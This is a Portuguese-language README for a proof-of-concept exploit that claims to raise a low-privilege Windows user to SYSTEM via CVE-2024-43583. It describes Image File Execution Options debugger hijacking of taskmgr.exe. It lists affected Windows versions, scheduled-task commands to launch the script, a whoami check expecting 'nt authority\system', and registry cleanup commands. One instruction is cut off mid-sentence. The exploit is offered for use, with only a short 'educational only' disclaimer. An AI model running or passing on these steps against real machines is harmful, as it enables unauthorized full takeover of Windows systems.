
Prova de conceito para CVE-2024-43583
Autor: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 é uma vulnerabilidade de elevação de privilégio que afeta o componente Winlogon da Microsoft. Explorar essa falha permite que um usuário com privilégios baixos eleve seus privilégios para SYSTEM, comprometendo totalmente o sistema.
Esta prova de conceito (PoC) utiliza o Debugger Hijacking por meio da chave de registro Image File Execution Options (IFEO) do Windows para substituir um processo legítimo do sistema por um payload malicioso.
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
Este exploit é apenas para fins educacionais e de pesquisa. Não o utilize em sistemas não autorizados. O uso indevido deste exploit pode ser ilegal.
Certifique-se de que o Python esteja instalado no sistema alvo. Caso contrário, use a versão compilada em .exe.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc). Se for bem-sucedido, um shell SYSTEM aparecerá no lugar.Após a execução do exploit, verifique seus privilégios:
whoami
Saída esperada:
nt authority\system
Execute o script novamente e selecione a opção [2] para remover o sequestro.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"